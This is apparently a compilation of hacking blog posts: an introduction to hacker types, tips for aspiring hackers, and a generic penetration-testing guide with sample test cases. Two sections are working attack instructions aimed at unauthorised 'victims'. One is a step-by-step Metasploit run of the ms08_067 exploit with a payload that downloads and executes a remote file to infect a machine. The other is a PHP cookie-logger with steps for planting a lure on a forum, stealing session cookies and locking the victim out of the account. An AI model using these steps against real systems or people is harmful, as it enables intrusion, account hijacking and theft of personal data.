Begginer Guide to Hacking

There are three types of hackers:

White Hats:

--> The White Hat hacker has dedicated himself to fight malware and help others with their computer problems. He is a person you can trust, and he will most likely end up in a good paying job as a computer programmer or a security consultant. He will most certainly not end up in jail.

Grey Hats:

--> The Grey Hat hacker are in between white Hats and Black Hats. He will most likely commit pranks at people that he thinks is harmless, but it can also be illegal. He can at one time be helpful and help you with a computer problem, but at the same time infect you with his own virus. There is a chance that the grey hat will end up in prison.

Black Hats:

--> The Black hat hacker also known as a cracker is the one who deface websites, steal private information and such illegal activity. It is very time consuming to become a black hat. It can be very hard for them to get a job because of the illegal activity. If law enforcements gets you, you can expect jail time.

So where to start?

You should know the answer to these questions before you start your hacking career.

Which type of hacker do you want to be (white hat, grey hat or black hat)?
Which type of hacking do you want to work with (website hacking, system exploits, pentesting etc.)?
What is your end-goal?

You should meet these requirements to become a successful hacker.

You shall be patient.
You shall dedicate a lot of time to hacking. You will never stop learning, since hacking is a lifestyle.
You should have a computer (I expect you to have one since you are reading this).
You shall be interested in how the different computer systems works, and how to control them.

Now that you have an idea of what kind of hacker, you want to be we will look closer into the different topics you can work with as a hacker.

I. Website Hacking:

You properly already guessed it, but website hacking is about hacking websites
You use your skills to find exploits and vulnerabilities in websites and web applications. Almost all major hacking stories in the news are about websites and databases that have been hacked. Once you have enough experience in website security you will be amazed about how easy it is to find vulnerabilities in websites. However, it will take a lot of effort and time to reach that level of skills. You will need to know a large amount of server-side languages and website construction languages like PHP, HTML, JavaScript, SQL, ASP, ASP.NET and Perl. This was just some of the languages you should know about. I will recommend you to take JavaScript, SQL and PHP very serious since it is in those languages you will find the most vulnerabilities.

II. Pen testing and Forensics:

Pen testing and forensics can earn you big money. It is these guys the company’s call when they have been hacked. They are experts in operating systems, wireless connections and exploiting computers. This way will take A LOT of time and effort since there is so much you should know about. You shall know about how the different operating systems works, which exploit there is to them, how to exploit them, routers, encryption, malware etc. the list is almost endless.

III. Code exploiting:

Not many people know about this. This will require you to be a complete expert at programming. You shall be at least as good at these programming languages as your main language like English. This kind of hacking is taking a lot of time, and will require you to be patient. Do not get me wrong, every company that releases software like Symantec, Google, Microsoft, Adobe and Oracle have hackers with these skills employed to check their software for vulnerabilities. Sadly, they cannot find every security hole and therefore some very smart black hat hackers are able to find them, and exploit them before the companies get the vulnerability patched. You should know the most popular languages like C++, Java and C etc.

IV. Computer security:

The work of these people do looks a lot like the pentesters. These people are able to detect and analyze new viruses and malware. They are working for companies like Symantec, KasperSky and Avira etc. Some of them are also working on labs that tests AV’s and new viruses. They are experts in how viruses works and how they infect systems.

You should now have an idea on where to start and in which direction you want to go.

Welcome to the hacker’s world, a new world will open up for you and you will never regret that you chose to become a hacker...

How to infect or hack a computer with only IP address:

Requirements:

Nmap
Metasploit

First of all you need target IP of your victim.

Then open Metasploit Console & type db_create.
[Usage: This will create or connect you to a(your) database.]

Once you do that type Nmap.
[Usage: This will load Nmap in Metasploit Console]

Next you need to type db_nmap -sT -sV <target IP>
[This will scan OS, Ports, and Services running on the victim's computer.]
Wait for 5 minutes to complete the scan.

Once done, Note down the OS, Ports, and Services running on the slave's computer.

Now it's time to exploit the victim's machine.
Exploit depends on the OS, Ports, and Services running on the slave's computer.
So, you're lucky if you get OS WIN XP or 2000 because it's easy to exploit them.
No matter whether they are protected by a firewall or not.

Now:

Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)

Type show exploits
[Usage: This will show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi
[Usage: This will select the exploit windows/smb/ms08_067_netapi]

Now Type show targets
[Usage: This will show all targets by exploit]

Now Type set target 0
[Usage: This will set target to 0 specified]
Then type show payloads
[Usage: This will bring up all the payloads]
Next type set payload windows/download_exec
[Usage: This will set the payload as windows/download_exec]

Then Type show options
[Usage: This will show all options in the exploit & payload]

In window you will see many options, in which you need to
Fill only two options RHOST & URL.

Type set RHOST <xxx.xxx.xxx.xxx >
[Usage: This will set RHOST (victim's ip) to xxx.xxx.xxx.xxx]

Next Type set URL http://www.xxxx.com/xxx.exe
[Usage: This will set the URL to your direct server link.]

Finally you need to type exploit
[Usage: This will launch the exploit & your slave will be infected.]

You can now control your slave with a RAT. (Remote administration tool.)
So, any versions of Win 2000-XP can be exploited easily.

You can use the command db_autopwn –p –t –e.

In most cases you get a shell!

Create a CookieLogger and Hack any Account!

Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hackany account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.

What is a CookieLogger?

A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today we are going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …

Step 1: Save the notepad file from the link below and Rename it as Fun.gif:

http://crocko.com/1702516956.html

Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:


<?php
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 3: Create a new Notepad File and Save it as logfile.txt

Step 4: Upload this file to your server

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://0fees.net/

Step 5: Go to the victim forum and insert this code in the signature or a post:

http://crocko.com/1702516964.html

<a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a>

Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.

Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.

Disclaimer: We don’t take responsibility for what you do with this script, served for educational purpose only...

20 Best Ways to become a Better Hacker

1) Learning scripting languages such as Python, Perl and ruby can help you automate your tasks and for sure improve your skills.

2) Understanding all possible user inputs is the fastest way to hack into the systems.

3) When u gain access to an account or whatever u hacking in to, best practice do not alter anything. just monitor the activity and continue fetching information u need.

4) Travel and see different countries, it will make you better.

5) Never hesitate for usage of Google and other resources available i.e. exploit-db, and be updated with versions and bugs in each versions, for example, if I talk about WordPress, then one who is looking to hack WordPress website or pentest, then he should be well aware of at least 3.0+ versions updating, so whichever version is being used on the website, he should know the vulnerabilities in that and their exploitation 

6) RTFM, don't expect handouts. Educated questions, gets you educated answers 

7) Move to Linux, learn Programming Languages C, Pearl, Lisp, Java and Html and write open source programs. Improve your functional English. 

8)The most important factor for becoming a good hacker is, you must have your personal interest with computers. Additionally, you have to be definite in your work, such that you should take exactly interest in One thing at a single time. After covering the appropriate level of theory, the learner should try it practically as much as his satisfaction level. Watching Tutorials only for taking points, not really for following them from a to z exactly, because you have to be a good learner only if you have your personal intention for doing the things creatively.

9) One thing , Learn how old Hackers Started don't focus on new Programs like BACKTRACK , METASPLOIT , Learn Manual Hacking , Learn Coding and be patient ! Knowledge will come with time ! and practice all methods 

10) Do not rely on tricks for hacking. As they will keep you a script kiddie, get deep understanding about stuffs. And also don't rush from one topic to another. All those combined will make you a better hacker. "Slow and Steady wins the race" 

11) A support will always lift you up. Join groups, forums. Keep yourself updated with latest hacking news by reading blogs [Like this ;)], tweets etc. 

12) Understand what programming language to use at what moment. You're time is valuable so don't waste it writing something that could have been done faster! (and understand the difference between a scripting language and a programming language, python for example is a programming language. 

13) During hacking remain mentally intact and focus on your each step. During a step always remember your next steps and the way you have to link them. Dont always use old methods and tricks, try new one and use your own mind too. and remember one thing that there is no shortcut of Hacking, to became a hacker, you have to give your whole passion to hacking. "Hacking is an Art, and Hacker is an Artist". 

14) This Attitude should be there within "SWEAT MORE IN PRACTISE, SO YOU BLEED LESS IN WAR".

15) Whatever you're going to test,start it with a basic stuff. If you dont know any,start learning.

16) Enumeration is the key to pwnage, the more you enumerate the more attack surface you get 

17) Be patient! Learn different protocols and read the RFCs to understand how they work and if there are some "security by design" issues. After that you should try to understand the context you're in and therefore develop an exploit for this particular context. 

18) Sleep less, read more. Learn & Think & Try & Fail & Never give up. Remember, "...imagination will take you everywhere". 

19) Don't compete anyone, never think you are the best, just compete "the you in the past". There will always be a vulnerability waiting for being discovered, by someone who thinks different. Understanding human logic makes things easier. "Hackers realize, kiddies memorize"

20) Learn your own systems inside out, before moving on to other systems. The better you know your own, the more capable you will find yourself when it comes time to make your system work for you.

Penetration Testing – Complete Guide with Sample Test Cases

What is Penetration Testing?
It’s the process to identify security vulnerabilities in an application by evaluating the system or network with various malicious techniques. Purpose of this test is to secure important data from outsiders like hackers who can have unauthorized access to system. Once vulnerability is identified it is used to exploit system in order to gain access to sensitive information.
Causes of vulnerabilities:
- Design and development errors
- Poor system configuration
- Human errors

Why Penetration testing?

- Financial data must be secured while transferring between different systems
- Many clients are asking for pen testing as part of the software release cycle
- To secure user data
- To find security vulnerabilities in an application

It’s very important for any organization to identify security issues present in internal network and computers. Using this information organization can plan defense against any hacking attempt. User privacy and data security are the biggest concerns nowadays. Imagine if any hacker manage to get user details of social networking site like Facebook. Organization can face legal issues due to a small loophole left in a software system. Hence big organizations are looking for PCI compliance certifications before doing any business with third party clients.
What should be tested?
- Software
- Hardware
- Network
- Process

Penetration Testing Types:

1) Social Engineering: Human errors are the main causes of security vulnerability. Security standards and policies should be followed by all staff members to avoid social engineering penetration attempt. Example of these standards include not to mention any sensitive information in email or phone communication. Security audits can be conducted to identify and correct process flaws.
2) Application Security Testing: Using software methods one can verify if the system is exposed to security vulnerabilities.
3) Physical Penetration Test: Strong physical security methods are applied to protect sensitive data. This is generally useful in military and government facilities. All physical network devices and access points are tested for possibilities of any security breach.
Pen Testing Techniques:
1) Manual penetration test
2) Using automated penetration test tools
3) Combination of both manual and automated process
The third process is more common to identify all kinds of vulnerabilities.

Penetration Testing Tools:

Automated tools can be used to identify some standard vulnerability present in an application. Pentest tools scan code to check if there is malicious code present which can lead to potential security breach. Pentest tools can verify security loopholes present in the system like data encryption techniques and hard coded values like username and password.
Criteria to select the best penetration tool:
- It should be easy to deploy, configure and use.
- It should scan your system easily.
- It should categorize vulnerabilities based on severity that needs immediate fix.
- It should be able to automate verification of vulnerabilities.
- It should re-verify exploits found previously.
- It should generate detailed vulnerability reports and logs.
Once you know what tests you need to perform you can either train your internal test resources or hire expert consultants to do the penetration task for you.
Examples of Free and Commercial Tools -
Nmap, Nessus, Metasploit, Wireshark, OpenSSL, Cain & Abel, THC Hydra, w3af
Commercial services: Pure Hacking, Torrid Networks, SecPoint, Veracode.
Limitations of Pentest tools: Sometimes these tools can flag false positive output which results in spending more developer time on analyzing such vulnerabilities which are not present.

Manual Penetration Test:

It’s difficult to find all vulnerabilities using automated tools. There are some vulnerabilities which can be identified by manual scan only. Penetration testers can perform better attacks on application based on their skills and knowledge of system being penetrated. The methods like social engineering can be done by humans only. Manual checking includes design, business logic as well as code verification.
Penetration Test Process:
Let’s discuss the actual process followed by test agencies or penetration testers. Identifying vulnerabilities present in system is the first important step in this process. Corrective action is taken on these vulnerability and same penetration tests are repeated until system is negative to all those tests.
We can categorize this process in following methods:
1) Data collection: Various methods including Google search are used to get target system data. One can also use web page source code analysis technique to get more info about the system, software and plugin versions. There are many free tools and services available in the market which can give you information like database or table names, DB versions, software versions, hardware used and various third party plugins used in the target system.
2) Vulnerability Assessment: Based on the data collected in first step one can find the security weakness in the target system. This helps penetration testers to launch attacks using identified entry points in the system.
3) Actual Exploit: This is crucial step. It requires special skills and techniques to launch attack on target system. Experienced penetration testers can use their skills to launch attack on the system.
4) Result analysis and report preparation: After completion of penetration tests detailed reports are prepared for taking corrective actions. All identified vulnerabilities and recommended corrective methods are listed in these reports. You can customize vulnerability report format (HTML, XML, MS Word or PDF) as per your organization needs.

Penetration testing sample test cases (test scenarios):

Remember this is not functional testing. In Pentest your goal is to find security holes in the system. Below are some generic test cases and not necessarily applicable for all applications.
1) Check if web application is able to identify spam attacks on contact forms used in the website.
2) Proxy server – Check if network traffic is monitored by proxy appliances. Proxy server make it difficult for hackers to get internal details of the network thus protecting the system from external attacks.
3) Spam email filters – Verify if incoming and outgoing email traffic is filtered and unsolicited  emails are blocked. Many email clients come with in-build spam filters which needs to be configured as per your needs. These configuration rules can be applied on email headers, subject or body.
4) Firewall – Make sure entire network or computers are protected with Firewall. Firewall can be a software or hardware to block unauthorized access to system. Firewall can prevent sending data outside the network without your permission.
5) Try to exploit all servers, desktop systems, printers and network devices.
6) Verify that all usernames and passwords are encrypted and transferred over secured connection like https.
7) Verify information stored in website cookies. It should not be in readable format.
8 ) Verify previously found vulnerabilities to check if the fix is working.
9) Verify if there is no open port in network.
11) Verify all telephone devices.
12) Verify WIFI network security.
13) Verify all HTTP methods. PUT and Delete methods should not be enabled on web server .
14) Password should be at least 8 character long containing at least one number and one special character.
15) Username should not be like “admin” or “administrator”.
16) Application login page should be locked upon few unsuccessful login attempts.
17) Error messages should be generic and should not mention specific error details like “Invalid username” or “Invalid password”.
19) Verify if special characters, html tags and scripts are handled properly as an input value.
20) Internal system details should not be revealed in any of the error or alert messages.
21) Custom error messages should be displayed to end user in case of web page crash.
22) Verify use of registry entries. Sensitive information should not be kept in registry.
23) All files must be scanned before uploading to server.
24) Sensitive data should not be passed in urls while communicating with different internal modules of the web application.
25) There should not be any hard coded username or password in the system.
26) Verify all input fields with long input string with and without spaces.
27) Verify if reset password functionality is secure.
28) Verify application for SQL Injection.
29) Verify application for Cross Site Scripting.
31) Important input validations should be done at server side instead of JavaScript checks at client side.
32) Critical resources in the system should be available to authorized persons and services only.
33) All access logs should be maintained with proper access permissions.
34) Verify user session ends upon log off.
35) Verify that directory browsing is disabled on server.
36) Verify that all applications and database versions are up to date.
37) Verify url manipulation to check if web application is not showing any unwanted information.
38) Verify memory leak and buffer overflow.
39) Verify if incoming network traffic is scanned to find Trojan attacks.
40) Verify if system is safe from Brute Force Attacks – a trial and error method to find sensitive information like passwords.
41) Verify if system or network is secured from DoS (denial-of-service) attacks. Hacker can target network or single computer with continuous requests due to which resources on target system gets overloaded resulting in denial of service for legit requests.
These are just the basic test scenarios to get started with Pentest. There are hundreds of advanced penetration methods which can be done either manually or with the help of automation tools.
Further reading:
Pen Testing Standards – PCI DSS (Payment Card Industry Data Security Standard), OWASP (Open Web Application Security Project), ISO/IEC 27002, OSSTMM (The Open Source Security Testing Methodology Manual).
Certifications – GPEN, Associate Security Tester (AST), Senior Security Tester (SST), Certified Penetration Tester (CPT).
Finally as a penetration tester you should collect and log all vulnerabilities in the system. Don’t ignore any scenario considering that it won’t be executed by end users.